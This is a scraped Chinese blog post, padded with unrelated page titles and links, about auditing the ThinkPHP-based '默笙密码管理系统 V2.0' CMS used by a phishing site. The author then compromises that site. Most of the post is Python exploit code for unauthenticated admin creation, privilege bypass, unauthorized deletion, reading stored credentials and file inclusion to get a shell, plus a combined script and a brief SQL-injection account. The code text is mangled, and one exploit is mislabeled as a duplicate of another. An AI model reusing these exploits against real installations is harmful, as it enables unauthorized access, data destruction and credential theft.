当前位置: 首页 > news >正文

如何做汽车的创意视频网站设计shopify不如wordpress

如何做汽车的创意视频网站设计,shopify不如wordpress,wordpress可视化功能,涟水建设局网站本文仅用于技术研究学习#xff0c;请遵守相关法律#xff0c;禁止使用本文所提及的相关技术开展非法攻击行为#xff0c;由于传播、利用本文所提供的信息而造成任何不良后果及损失#xff0c;与本账号及作者无关。 资料查询来源- 安全社区与AI模型结合探索【文末申请免费…本文仅用于技术研究学习请遵守相关法律禁止使用本文所提及的相关技术开展非法攻击行为由于传播、利用本文所提供的信息而造成任何不良后果及损失与本账号及作者无关。 资料查询来源- 安全社区与AI模型结合探索【文末申请免费试用资格】 前言 不知道大家玩不玩游戏我经常玩英雄联盟但在游戏中久久没有当过幸运召唤师最夸张的一次跟室友出去上网唯独我没有成为幸运召唤师。但有意思的是我却在邮箱里发现了召唤师的邮件这一下子乐子就来了域名一眼就觉得是钓鱼网站有问题的那就开始简单的测试一下吧~ 0x01网站踩点 首先我们对目标进行目录扫描, 发现 admin.php 进入发现是后台界面, 右击查看网页源码 我们复制 title 到百度搜索一下 第一个是官网 我把源码下载, 看了一遍, 发现是一个叫 默笙密码管理系统 V2.0 这套源码和钓鱼网站一致 0x02开始审计 这套 cms 是基于 thinkphp 的, 所以我们直接跳到控制器开始审计 我们看到代码都是以 Model 对象的方式调用数据库查询, 所以基本不存在注入, 所以我们看下有没有逻辑绕过漏洞, 或者是隐藏的接口 0x03思路梳理 首先审计 Admin 的控制器 打开看了一下除了 Login 其它的控制器均有登录认证, 所以我们先审计 Login 我们看到有 5 个方法 我们先打开前 2 个方法 方法 login 是判断数据库中是否存在管理员, 如果不存在则去 reg 注册管理员 方法 reg 是判断数据库中是否存在管理员, 如果不存在则进行注册, 所以 login 和 reg 方法是没有洞了 方法 loging 是登陆的, 我们上文说了是代码都是以 Model 对象的方式调用数据库查询, 所以基本不存在注入, 所以 loging 也没洞 方法 regist 他首先判断了提交方式是不是 AJAX 我们只要在协议头添加 X-Requested-With:XMLHttpRequest 就好了 然后我们看到两个参数 $data[username]I(post.p,,md5);$data[password]I(post.c,,md5); 然后它竟然直接进行进行添加管理员了, 不过这个管理员不是超级管理员, 但是可以登录后台就已经足够了, 下面有个漏洞是提权 漏洞一 任意管理员添加 exp def RegAdmin(): domain127.0.0.1 username.join(random.sample(zyxwvutsrqponmlkjihgfedcba12345678910,10)) password.join(random.sample(zyxwvutsrqponmlkjihgfedcba12345678910,10)) headers { X-Requested-With:XMLHttpRequest, Content-Type:application/x-www-form-urlencoded } datapusernamecpassword flag requests.post(http://domain/admin.php/login/regist, datadata,headersheaders).text.find(\\u8d26\\u53f7\\u5bc6\\u7801\\u521b\\u5efa\\u6210\\u529f)!-1 if flag: return Exploit The Vulnerability \nUserName:hashlib.md5(username.encode(utf-8)).hexdigest()PassWord:password else: return Failure To Exploit A Vulnerability 漏洞二 将普通管理员提权到超级管理员 我们看到验证管理员的逻辑是这样的, 它先从 session 取出管理员的 id 然后进行查询 判断字段 is_all 是否等于 1, 如果是 1 则不是管理员, 反之 我们只需要社工管理员让他删掉我们的账户, 我们就可以跳过这个认证, 成为超级管理员 漏洞三 越权删除分类 直接将 post 过来的 id 进行删除 exp def classdel(id): domain127.0.0.1 cookiePHPSESSID2cplbvnuqko23di92lj7ufjpk1 headers { X-Requested-With: XMLHttpRequest, Content-Type: application/x-www-form-urlencoded, Cookie:cookie } data idstr(id) flag requests.post(http:// domain /admin.php/Class/classdel, datadata, headersheaders).text.find(\\u5220\\u9664\\u6210\\u529f)!-1 if flag: return Exploit The Vulnerability; else: return Failure To Exploit A Vulnerability 漏洞四 越权删除超级管理员 直接将 post 过来的 id 进行删除, 只能删除超级管理员 exp def userdel(id): domain127.0.0.1 cookiePHPSESSID2cplbvnuqko23di92lj7ufjpk1 headers { X-Requested-With: XMLHttpRequest, Content-Type: application/x-www-form-urlencoded, Cookie:cookie } data idstr(id) flag requests.post(http:// domain /admin.php/User/userdel, datadata, headersheaders).text.find(\\u5220\\u9664\\u6210\\u529f)!-1 if flag: return Exploit The Vulnerability; else: return Failure To Exploit A Vulnerability 漏洞五 越权删除钓鱼密码 直接将 post 过来的 id 进行删除, 不能删除含有普通管理员 id 的 exp def userdel(id): domain127.0.0.1 cookiePHPSESSID2cplbvnuqko23di92lj7ufjpk1 headers { X-Requested-With: XMLHttpRequest, Content-Type: application/x-www-form-urlencoded, Cookie:cookie } data idstr(id) flag requests.post(http:// domain /admin.php/User/userdel, datadata, headersheaders).text.find(\\u5220\\u9664\\u6210\\u529f)!-1 if flag: return Exploit The Vulnerability; else: return Failure To Exploit A Vulnerability 漏洞六 越权查看钓鱼密码 直接将 get 过来的 id 进行查询 exp def GetPass(id): domain127.0.0.1 cookiePHPSESSID2cplbvnuqko23di92lj7ufjpk1 headers { Cookie: cookie } username password resultrequests.get(http://domain/admin.php/pass/uppass/id/str(id).html,headersheaders).text searchObj re.search(ridusername\s\S\svalue(\S), result, re.M | re.I) searchObj2 re.search(ridpassword\s\S\svalue(\S), result, re.M | re.I) try: username searchObj.group(1) password searchObj2.group(1) except Exception: return Failure To Exploit A Vulnerability return username-----password; return  result 漏洞七 GetShell 文件包含 前提是能在目标服务器上传. html 后缀的文件 exp def uptemple(filename): domain127.0.0.1 cookiePHPSESSID2cplbvnuqko23di92lj7ufjpk1 headers { X-Requested-With: XMLHttpRequest, Content-Type: application/x-www-form-urlencoded, Cookie:cookie } data ufilename flag requests.post(http:// domain /admin.php/Temple/uptemple, datadata, headersheaders).text.find(\\u4e3b\\u9898\\u5207\\u6362\\u6210\\u529f)!-1 if flag: return Exploit The Vulnerability; else: return Failure To Exploit A Vulnerability return  result 0x04 进入服务器 利用以上漏洞我们已经控制了目标服务器 我们看到这个钓鱼网站有很多的模板, 还注明了钓鱼网站的作者, 我们把它钓到的密码进行删除 完整 exp import hashlibimport randomimport requestsimport redomain127.0.0.1cookiePHPSESSID2cplbvnuqko23di92lj7ufjpk1def GetPass(id): global cookie global domain headers { Cookie: cookie } username password resultrequests.get(http://domain/admin.php/pass/uppass/id/str(id).html,headersheaders).text searchObj re.search(ridusername\s\S\svalue(\S), result, re.M | re.I) searchObj2 re.search(ridpassword\s\S\svalue(\S), result, re.M | re.I) try: username searchObj.group(1) password searchObj2.group(1) except Exception: return Failure To Exploit A Vulnerability return username-----password; return  resultdef DelPass(id): global cookie global domain headers { X-Requested-With:XMLHttpRequest, Content-Type:application/x-www-form-urlencoded, Cookie: cookie } flag requests.post(http://domain/admin.php/Pass/passdel,dataidstr(id),headersheaders).text.find(\\u5220\\u9664\\u6210\\u529f)!-1 if flag: return Exploit The Vulnerability else: return Failure To Exploit A Vulnerabilitydef RegAdmin(): global domain username.join(random.sample(zyxwvutsrqponmlkjihgfedcba12345678910,10)) password.join(random.sample(zyxwvutsrqponmlkjihgfedcba12345678910,10)) headers { X-Requested-With:XMLHttpRequest, Content-Type:application/x-www-form-urlencoded } datapusernamecpassword flag requests.post(http://domain/admin.php/login/regist, datadata,headersheaders).text.find(\\u8d26\\u53f7\\u5bc6\\u7801\\u521b\\u5efa\\u6210\\u529f)!-1 if flag: return Exploit The Vulnerability \nUserName:hashlib.md5(username.encode(utf-8)).hexdigest()PassWord:password else: return Failure To Exploit A Vulnerabilitydef classdel(id): global domain global cookie headers { X-Requested-With: XMLHttpRequest, Content-Type: application/x-www-form-urlencoded, Cookie:cookie } data idstr(id) flag requests.post(http:// domain /admin.php/Class/classdel, datadata, headersheaders).text.find(\\u5220\\u9664\\u6210\\u529f)!-1 if flag: return Exploit The Vulnerability; else: return Failure To Exploit A Vulnerabilitydef userdel(id): global domain global cookie headers { X-Requested-With: XMLHttpRequest, Content-Type: application/x-www-form-urlencoded, Cookie:cookie } data idstr(id) flag requests.post(http:// domain /admin.php/User/userdel, datadata, headersheaders).text.find(\\u5220\\u9664\\u6210\\u529f)!-1 if flag: return Exploit The Vulnerability; else: return Failure To Exploit A Vulnerabilitydef uptemple(filename): global domain global cookie headers { X-Requested-With: XMLHttpRequest, Content-Type: application/x-www-form-urlencoded, Cookie:cookie } data ufilename flag requests.post(http:// domain /admin.php/Temple/uptemple, datadata, headersheaders).text.find(\\u4e3b\\u9898\\u5207\\u6362\\u6210\\u529f)!-1 if flag: return Exploit The Vulnerability; else: return Failure To Exploit A Vulnerabilityif __name____main__: print(RegAdmin()) 添加管理员 print(GetPass(1)) 获取密码 print(DelPass(1)) 删除密码 print(classdel(1)) 删除分类 print(userdel(1)) 删除管理员 print(uptemple(../test)) 文件包含 0x05 再次出击 多天后管理员发觉了它的鱼站被搞了, 换了一套 cms 扫描目录, 发现 history 目录, 打开发现后台 0x06 思路转换 单引号输入报错, 是注入 不过 sqlmap 识别出来的是时间注入, 我们利用它这个报错将时间注入升级到布尔注入 0x07 密码破解 解出 md5, 登陆后台 事情到这也就接受了,最后网站站主也跑路了。总的来说这次的渗透很有意思。欢迎大家来交流
http://www.w-s-a.com/news/988496/

相关文章:

  • 北京软件网站开发装修设计培训机构
  • 哪个网站能帮助做路书网站建设的技巧
  • 上海网站备案在哪里在国外怎么做网站
  • 做网站得花多钱乡村振兴网站建设
  • 站设计培训课程wordpress自动回复
  • 上海闵行区 网站建设永久免费crm软件下载
  • 天津营销网站建设公司排名台州网站排名公司
  • 环保网站 怎么做物流网站的功能与特色
  • 网站多久才会被收录服务器租用泰海
  • 电商网站建设合同模板临汾推广型网站建设
  • 天猫商务网站建设目的长春网站设计
  • 公司网站建设会议纪要昆山高端网站建设机构
  • 做消费网站流程深圳网站设计价格
  • 做电影网站怎么接广告中国最新军事新闻视频
  • 网站推广设计做哪些设置自动删除的wordpress
  • 东莞东坑网站设计专业网站制作设
  • 网站怎么做现场直播视频成都科技网站建设找
  • 个人网页设计步骤网站没有内容 能做优化吗
  • 专业网站建设公司招聘网站排行榜
  • 网站建设规范方法企业解决方案架构
  • ae做网站导航wordpress门户
  • 重庆市网站备案材料云南做网站
  • 网页设计模板网站免费珠海视窗网
  • 茂名模板建站定制WordPress注册不提示
  • 陕西营销型手机网站建设深圳制作网站服务
  • 受欢迎的锦州网站建设Wordpress 图片左右滑动
  • 湖南优化网站建设线上网站建设需求
  • 建什么类型的网站访问量比较大哪些外包公司比较好
  • php网站地图外贸建站哪家强外贸网站怎么做
  • 宁波五金网站建设中国建筑网官网投诉查询